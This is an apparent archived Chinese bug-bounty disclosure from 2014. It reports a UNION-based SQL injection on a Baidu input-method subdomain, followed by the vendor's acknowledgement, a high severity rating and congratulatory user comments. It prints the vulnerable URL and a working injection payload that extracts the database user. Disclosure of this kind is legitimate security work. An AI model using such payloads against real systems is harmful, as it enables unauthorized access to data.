百度某分站SQL注入-支持union

http://shurufa.baidu.com/?act=dict.checkname

type=dict LIMIT 1,1 UNION ALL SELECT CONCAT(0x7c,user(),0x7c) %23&name=admin

过滤

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-17 21:53

厂商回复：

感谢对百度安全的支持。我们已联系业务部门处理。

最新状态：

暂无

1. 2014-07-17 20:49 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   一哥又来了！一楼放鞭炮

   1# 回复此人

2. 2014-07-17 20:50 | Kanade Ti ( 路人 | Rank:0 漏洞数:1 )

   0

   二楼二踢脚

   2# 回复此人

3. 2014-07-17 21:10 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

   0

   一哥又来了！

   3# 回复此人

4. 2014-07-17 21:22 | Stardustsky ( 路人 | Rank:4 漏洞数:3 | ……)

   0

   一哥刷分无节操

   4# 回复此人

5. 2014-07-17 21:32 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

   0

   当时我就惊呆了

   5# 回复此人

6. 2014-07-17 21:36 | Undoit ( 普通白帽子 | Rank:167 漏洞数:25 | 打酱油)

   0

   百度专场

   6# 回复此人

7. 2014-07-18 07:49 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

   0

   膜拜一哥

   7# 回复此人

8. 2014-09-01 02:10 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

   0

   真心一哥啊。

   8# 回复此人